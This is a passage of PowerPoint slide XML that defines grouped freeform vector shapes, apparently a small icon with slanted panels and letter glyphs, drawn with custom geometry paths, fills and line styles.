                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB489C56-8595-4CCD-B0B5-137F994D4505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gray">
                  <a:xfrm flipH="1">
                    <a:off x="4038" y="782"/>
                    <a:ext cx="106" cy="105"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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1616" name="Group 297">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4BFF667-885E-4CF5-AD0A-399EDC2707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02938" y="1385524"/>
              <a:ext cx="2044700" cy="896938"/>
              <a:chOff x="1263" y="2113"/>
              <a:chExt cx="1288" cy="565"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1875" name="Group 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99766C35-1557-45BB-9519-05FA5D11DFA5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1397" y="2113"/>
                <a:ext cx="282" cy="269"/>
                <a:chOff x="5875" y="-4975"/>
                <a:chExt cx="1345" cy="1285"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1924" name="Freeform 36">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EFDCF6-CF26-469A-B901-1EA3D1D8F56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5875" y="-4975"/>
                  <a:ext cx="1345" cy="1285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1345"/>
                    <a:gd name="T1" fmla="*/ 362 h 1285"/>
                    <a:gd name="T2" fmla="*/ 0 w 1345"/>
                    <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                    <a:gd name="T4" fmla="*/ 1345 w 1345"/>
                    <a:gd name="T5" fmla="*/ 924 h 1285"/>
                    <a:gd name="T6" fmla="*/ 1345 w 1345"/>
                    <a:gd name="T7" fmla="*/ 0 h 1285"/>
                    <a:gd name="T8" fmla="*/ 0 w 1345"/>
                    <a:gd name="T9" fmla="*/ 362 h 1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5" h="1285">
                      <a:moveTo>
                        <a:pt x="0" y="362"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1345" y="924"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1345" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36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25" name="Freeform 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770892FE-A7A3-41D7-9BA9-C7EDE072E44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5965" y="-4207"/>
                  <a:ext cx="312" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 312"/>
                    <a:gd name="T1" fmla="*/ 139 h 139"/>
                    <a:gd name="T2" fmla="*/ 0 w 312"/>
                    <a:gd name="T3" fmla="*/ 83 h 139"/>
                    <a:gd name="T4" fmla="*/ 312 w 312"/>
                    <a:gd name="T5" fmla="*/ 0 h 139"/>
                    <a:gd name="T6" fmla="*/ 312 w 312"/>
                    <a:gd name="T7" fmla="*/ 54 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 312"/>
                    <a:gd name="T9" fmla="*/ 139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2" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="139"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="312" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="312" y="54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cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C080C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/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26" name="Freeform 38">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26DFD44-9CFA-4045-AF83-46E85EEE528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5965" y="-4098"/>
                  <a:ext cx="312" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 312"/>
                    <a:gd name="T1" fmla="*/ 139 h 139"/>
                    <a:gd name="T2" fmla="*/ 0 w 312"/>
                    <a:gd name="T3" fmla="*/ 82 h 139"/>
                    <a:gd name="T4" fmla="*/ 312 w 312"/>
                    <a:gd name="T5" fmla="*/ 0 h 139"/>
                    <a:gd name="T6" fmla="*/ 312 w 312"/>
                    <a:gd name="T7" fmla="*/ 56 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 312"/>
                    <a:gd name="T9" fmla="*/ 139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2" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="139"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="82"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="312" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="312" y="56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cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C080C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/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27" name="Freeform 39">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE62798-B771-47B8-A11D-767B623CADE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6395" y="-4325"/>
                  <a:ext cx="310" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 310"/>
                    <a:gd name="T1" fmla="*/ 139 h 139"/>
                    <a:gd name="T2" fmla="*/ 0 w 310"/>
                    <a:gd name="T3" fmla="*/ 82 h 139"/>
                    <a:gd name="T4" fmla="*/ 310 w 310"/>
                    <a:gd name="T5" fmla="*/ 0 h 139"/>
                    <a:gd name="T6" fmla="*/ 310 w 310"/>
                    <a:gd name="T7" fmla="*/ 56 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 310"/>
                    <a:gd name="T9" fmla="*/ 139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0" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="139"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="82"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="56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cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C080C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/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28" name="Freeform 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E444B38-21A9-42E3-A8E9-B1E9F64758E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6818" y="-4439"/>
                  <a:ext cx="309" cy="140"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 309"/>
                    <a:gd name="T1" fmla="*/ 140 h 140"/>
                    <a:gd name="T2" fmla="*/ 0 w 309"/>
                    <a:gd name="T3" fmla="*/ 83 h 140"/>
                    <a:gd name="T4" fmla="*/ 309 w 309"/>
                    <a:gd name="T5" fmla="*/ 0 h 140"/>
                    <a:gd name="T6" fmla="*/ 309 w 309"/>
                    <a:gd name="T7" fmla="*/ 57 h 140"/>
                    <a:gd name="T8" fmla="*/ 0 w 309"/>
                    <a:gd name="T9" fmla="*/ 140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9" h="140">
                      <a:moveTo>
                        <a:pt x="0" y="140"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="14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cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C080C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/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29" name="Freeform 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5D54885-64D8-4234-88C8-FFE2E7ACFE6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6818" y="-4328"/>
                  <a:ext cx="309" cy="140"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 309"/>
                    <a:gd name="T1" fmla="*/ 140 h 140"/>
                    <a:gd name="T2" fmla="*/ 0 w 309"/>
                    <a:gd name="T3" fmla="*/ 83 h 140"/>
                    <a:gd name="T4" fmla="*/ 309 w 309"/>
                    <a:gd name="T5" fmla="*/ 0 h 140"/>
                    <a:gd name="T6" fmla="*/ 309 w 309"/>
                    <a:gd name="T7" fmla="*/ 55 h 140"/>
                    <a:gd name="T8" fmla="*/ 0 w 309"/>
                    <a:gd name="T9" fmla="*/ 140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9" h="140">
                      <a:moveTo>
                        <a:pt x="0" y="140"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="14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cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C080C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/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30" name="Freeform 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21761272-3C55-4F44-A2F0-3E1B0EBAEF7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6820" y="-4221"/>
                  <a:ext cx="310" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 310"/>
                    <a:gd name="T1" fmla="*/ 139 h 139"/>
                    <a:gd name="T2" fmla="*/ 0 w 310"/>
                    <a:gd name="T3" fmla="*/ 85 h 139"/>
                    <a:gd name="T4" fmla="*/ 310 w 310"/>
                    <a:gd name="T5" fmla="*/ 0 h 139"/>
                    <a:gd name="T6" fmla="*/ 310 w 310"/>
                    <a:gd name="T7" fmla="*/ 56 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 310"/>
                    <a:gd name="T9" fmla="*/ 139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0" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="139"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="85"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="56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cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="0C080C"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/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31" name="Freeform 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9018C6DA-13F0-419B-960D-E6AAF428126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5968" y="-4628"/>
                  <a:ext cx="311" cy="404"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 311"/>
                    <a:gd name="T1" fmla="*/ 404 h 404"/>
                    <a:gd name="T2" fmla="*/ 0 w 311"/>
                    <a:gd name="T3" fmla="*/ 85 h 404"/>
                    <a:gd name="T4" fmla="*/ 311 w 311"/>
                    <a:gd name="T5" fmla="*/ 0 h 404"/>
                    <a:gd name="T6" fmla="*/ 311 w 311"/>
                    <a:gd name="T7" fmla="*/ 322 h 404"/>
                    <a:gd name="T8" fmla="*/ 0 w 311"/>
                    <a:gd name="T9" fmla="*/ 404 h 4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1" h="404">
                      <a:moveTo>
                        <a:pt x="0" y="404"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="85"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="311" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="311" y="322"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="404"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/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32" name="Freeform 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED6FB57D-D93E-4B7D-91C4-3775EAFB221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gray">
                <a:xfrm>
                  <a:off x="6012" y="-4547"/>
                  <a:ext cx="223" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 94"/>
                    <a:gd name="T1" fmla="*/ 114 h 114"/>
                    <a:gd name="T2" fmla="*/ 39 w 94"/>
                    <a:gd name="T3" fmla="*/ 4 h 114"/>
                    <a:gd name="T4" fmla="*/ 53 w 94"/>
                    <a:gd name="T5" fmla="*/ 0 h 114"/>
                    <a:gd name="T6" fmla="*/ 94 w 94"/>
                    <a:gd name="T7" fmla="*/ 90 h 114"/>
                    <a:gd name="T8" fmla="*/ 79 w 94"/>
                    <a:gd name="T9" fmla="*/ 94 h 114"/>
                    <a:gd name="T10" fmla="*/ 67 w 94"/>
                    <a:gd name="T11" fmla="*/ 66 h 114"/>
                    <a:gd name="T12" fmla="*/ 25 w 94"/>
                    <a:gd name="T13" fmla="*/ 77 h 114"/>
                    <a:gd name="T14" fmla="*/ 14 w 94"/>
                    <a:gd name="T15" fmla="*/ 111 h 114"/>
                    <a:gd name="T16" fmla="*/ 0 w 94"/>
                    <a:gd name="T17" fmla="*/ 114 h 114"/>
                    <a:gd name="T18" fmla="*/ 29 w 94"/>
                    <a:gd name="T19" fmla="*/ 66 h 114"/>
                    <a:gd name="T20" fmla="*/ 63 w 94"/>
                    <a:gd name="T21" fmla="*/ 57 h 114"/>
                    <a:gd name="T22" fmla="*/ 53 w 94"/>
                    <a:gd name="T23" fmla="*/ 32 h 114"/>
                    <a:gd name="T24" fmla="*/ 45 w 94"/>
                    <a:gd name="T25" fmla="*/ 13 h 114"/>
                    <a:gd name="T26" fmla="*/ 40 w 94"/>
                    <a:gd name="T27" fmla="*/ 33 h 114"/>
                    <a:gd name="T28" fmla="*/ 29 w 94"/>
                    <a:gd name="T29" fmla="*/ 66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94" h="114">
                      <a:moveTo>
                        <a:pt x="0" y="114"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="39" y="4"/>
                        <a:pt x="39" y="4"/>
                        <a:pt x="39" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="94" y="90"/>
                        <a:pt x="94" y="90"/>
                        <a:pt x="94" y="90"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="79" y="94"/>
                        <a:pt x="79" y="94"/>
                        <a:pt x="79" y="94"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="66"/>
                        <a:pt x="67" y="66"/>
                        <a:pt x="67" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="77"/>
                        <a:pt x="25" y="77"/>
                        <a:pt x="25" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="111"/>
                        <a:pt x="14" y="111"/>
                        <a:pt x="14" y="111"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="114"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="29" y="66"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="57"/>
                        <a:pt x="63" y="57"/>
                        <a:pt x="63" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="32"/>
                        <a:pt x="53" y="32"/>
                        <a:pt x="53" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="24"/>
                        <a:pt x="47" y="18"/>
                        <a:pt x="45" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="20"/>
                        <a:pt x="42" y="26"/>
                        <a:pt x="40" y="33"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="29" y="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33" name="Freeform 45">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FC7FFD1-E228-484B-B448-E0C5F491BDD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6395" y="-4741"/>
                  <a:ext cx="310" cy="404"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 310"/>
                    <a:gd name="T1" fmla="*/ 404 h 404"/>
                    <a:gd name="T2" fmla="*/ 0 w 310"/>
                    <a:gd name="T3" fmla="*/ 83 h 404"/>
                    <a:gd name="T4" fmla="*/ 310 w 310"/>
                    <a:gd name="T5" fmla="*/ 0 h 404"/>
                    <a:gd name="T6" fmla="*/ 310 w 310"/>
                    <a:gd name="T7" fmla="*/ 321 h 404"/>
                    <a:gd name="T8" fmla="*/ 0 w 310"/>
                    <a:gd name="T9" fmla="*/ 404 h 4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0" h="404">
                      <a:moveTo>
                        <a:pt x="0" y="404"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="321"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="404"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/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34" name="Freeform 46">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C609C21-509E-443C-A245-EE1DDCC2C57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gray">
                <a:xfrm>
                  <a:off x="6461" y="-4663"/>
                  <a:ext cx="180" cy="267"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 76"/>
                    <a:gd name="T1" fmla="*/ 113 h 113"/>
                    <a:gd name="T2" fmla="*/ 0 w 76"/>
                    <a:gd name="T3" fmla="*/ 13 h 113"/>
                    <a:gd name="T4" fmla="*/ 37 w 76"/>
                    <a:gd name="T5" fmla="*/ 3 h 113"/>
                    <a:gd name="T6" fmla="*/ 56 w 76"/>
                    <a:gd name="T7" fmla="*/ 1 h 113"/>
                    <a:gd name="T8" fmla="*/ 67 w 76"/>
                    <a:gd name="T9" fmla="*/ 7 h 113"/>
                    <a:gd name="T10" fmla="*/ 71 w 76"/>
                    <a:gd name="T11" fmla="*/ 20 h 113"/>
                    <a:gd name="T12" fmla="*/ 67 w 76"/>
                    <a:gd name="T13" fmla="*/ 33 h 113"/>
                    <a:gd name="T14" fmla="*/ 57 w 76"/>
                    <a:gd name="T15" fmla="*/ 45 h 113"/>
                    <a:gd name="T16" fmla="*/ 71 w 76"/>
                    <a:gd name="T17" fmla="*/ 50 h 113"/>
                    <a:gd name="T18" fmla="*/ 76 w 76"/>
                    <a:gd name="T19" fmla="*/ 64 h 113"/>
                    <a:gd name="T20" fmla="*/ 73 w 76"/>
                    <a:gd name="T21" fmla="*/ 78 h 113"/>
                    <a:gd name="T22" fmla="*/ 65 w 76"/>
                    <a:gd name="T23" fmla="*/ 89 h 113"/>
                    <a:gd name="T24" fmla="*/ 54 w 76"/>
                    <a:gd name="T25" fmla="*/ 97 h 113"/>
                    <a:gd name="T26" fmla="*/ 38 w 76"/>
                    <a:gd name="T27" fmla="*/ 103 h 113"/>
                    <a:gd name="T28" fmla="*/ 0 w 76"/>
                    <a:gd name="T29" fmla="*/ 113 h 113"/>
                    <a:gd name="T30" fmla="*/ 13 w 76"/>
                    <a:gd name="T31" fmla="*/ 51 h 113"/>
                    <a:gd name="T32" fmla="*/ 35 w 76"/>
                    <a:gd name="T33" fmla="*/ 46 h 113"/>
                    <a:gd name="T34" fmla="*/ 48 w 76"/>
                    <a:gd name="T35" fmla="*/ 41 h 113"/>
                    <a:gd name="T36" fmla="*/ 55 w 76"/>
                    <a:gd name="T37" fmla="*/ 34 h 113"/>
                    <a:gd name="T38" fmla="*/ 58 w 76"/>
                    <a:gd name="T39" fmla="*/ 25 h 113"/>
                    <a:gd name="T40" fmla="*/ 55 w 76"/>
                    <a:gd name="T41" fmla="*/ 16 h 113"/>
                    <a:gd name="T42" fmla="*/ 48 w 76"/>
                    <a:gd name="T43" fmla="*/ 13 h 113"/>
                    <a:gd name="T44" fmla="*/ 33 w 76"/>
                    <a:gd name="T45" fmla="*/ 16 h 113"/>
                    <a:gd name="T46" fmla="*/ 13 w 76"/>
                    <a:gd name="T47" fmla="*/ 21 h 113"/>
                    <a:gd name="T48" fmla="*/ 13 w 76"/>
                    <a:gd name="T49" fmla="*/ 51 h 113"/>
                    <a:gd name="T50" fmla="*/ 13 w 76"/>
                    <a:gd name="T51" fmla="*/ 98 h 113"/>
                    <a:gd name="T52" fmla="*/ 38 w 76"/>
                    <a:gd name="T53" fmla="*/ 91 h 113"/>
                    <a:gd name="T54" fmla="*/ 47 w 76"/>
                    <a:gd name="T55" fmla="*/ 88 h 113"/>
                    <a:gd name="T56" fmla="*/ 55 w 76"/>
                    <a:gd name="T57" fmla="*/ 84 h 113"/>
                    <a:gd name="T58" fmla="*/ 60 w 76"/>
                    <a:gd name="T59" fmla="*/ 77 h 113"/>
                    <a:gd name="T60" fmla="*/ 62 w 76"/>
                    <a:gd name="T61" fmla="*/ 68 h 113"/>
                    <a:gd name="T62" fmla="*/ 59 w 76"/>
                    <a:gd name="T63" fmla="*/ 59 h 113"/>
                    <a:gd name="T64" fmla="*/ 51 w 76"/>
                    <a:gd name="T65" fmla="*/ 55 h 113"/>
                    <a:gd name="T66" fmla="*/ 36 w 76"/>
                    <a:gd name="T67" fmla="*/ 57 h 113"/>
                    <a:gd name="T68" fmla="*/ 13 w 76"/>
                    <a:gd name="T69" fmla="*/ 63 h 113"/>
                    <a:gd name="T70" fmla="*/ 13 w 76"/>
                    <a:gd name="T71" fmla="*/ 98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6" h="113">
                      <a:moveTo>
                        <a:pt x="0" y="113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37" y="3"/>
                        <a:pt x="37" y="3"/>
                        <a:pt x="37" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="1"/>
                        <a:pt x="51" y="0"/>
                        <a:pt x="56" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="2"/>
                        <a:pt x="64" y="4"/>
                        <a:pt x="67" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="11"/>
                        <a:pt x="71" y="15"/>
                        <a:pt x="71" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="24"/>
                        <a:pt x="70" y="28"/>
                        <a:pt x="67" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="37"/>
                        <a:pt x="61" y="41"/>
                        <a:pt x="57" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="45"/>
                        <a:pt x="68" y="47"/>
                        <a:pt x="71" y="50"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="54"/>
                        <a:pt x="76" y="58"/>
                        <a:pt x="76" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="69"/>
                        <a:pt x="75" y="73"/>
                        <a:pt x="73" y="78"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="83"/>
                        <a:pt x="68" y="86"/>
                        <a:pt x="65" y="89"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="92"/>
                        <a:pt x="59" y="95"/>
                        <a:pt x="54" y="97"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="100"/>
                        <a:pt x="44" y="101"/>
                        <a:pt x="38" y="103"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="113"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13" y="51"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="46"/>
                        <a:pt x="35" y="46"/>
                        <a:pt x="35" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="44"/>
                        <a:pt x="45" y="43"/>
                        <a:pt x="48" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="39"/>
                        <a:pt x="53" y="37"/>
                        <a:pt x="55" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="31"/>
                        <a:pt x="58" y="28"/>
                        <a:pt x="58" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="21"/>
                        <a:pt x="57" y="19"/>
                        <a:pt x="55" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="14"/>
                        <a:pt x="51" y="13"/>
                        <a:pt x="48" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="13"/>
                        <a:pt x="40" y="14"/>
                        <a:pt x="33" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="21"/>
                        <a:pt x="13" y="21"/>
                        <a:pt x="13" y="21"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="13" y="51"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13" y="98"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="91"/>
                        <a:pt x="38" y="91"/>
                        <a:pt x="38" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="90"/>
                        <a:pt x="45" y="89"/>
                        <a:pt x="47" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="87"/>
                        <a:pt x="53" y="85"/>
                        <a:pt x="55" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="82"/>
                        <a:pt x="59" y="80"/>
                        <a:pt x="60" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="74"/>
                        <a:pt x="62" y="71"/>
                        <a:pt x="62" y="68"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="64"/>
                        <a:pt x="61" y="61"/>
                        <a:pt x="59" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="56"/>
                        <a:pt x="54" y="55"/>
                        <a:pt x="51" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="55"/>
                        <a:pt x="43" y="55"/>
                        <a:pt x="36" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="63"/>
                        <a:pt x="13" y="63"/>
                        <a:pt x="13" y="63"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="13" y="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35" name="Freeform 47">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFD06521-EAF7-403F-B8C2-E5377147CA9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6818" y="-4854"/>
                  <a:ext cx="309" cy="404"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 309"/>
                    <a:gd name="T1" fmla="*/ 404 h 404"/>
                    <a:gd name="T2" fmla="*/ 0 w 309"/>
                    <a:gd name="T3" fmla="*/ 82 h 404"/>
                    <a:gd name="T4" fmla="*/ 309 w 309"/>
                    <a:gd name="T5" fmla="*/ 0 h 404"/>
                    <a:gd name="T6" fmla="*/ 309 w 309"/>
                    <a:gd name="T7" fmla="*/ 321 h 404"/>
                    <a:gd name="T8" fmla="*/ 0 w 309"/>
                    <a:gd name="T9" fmla="*/ 404 h 4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9" h="404">
                      <a:moveTo>
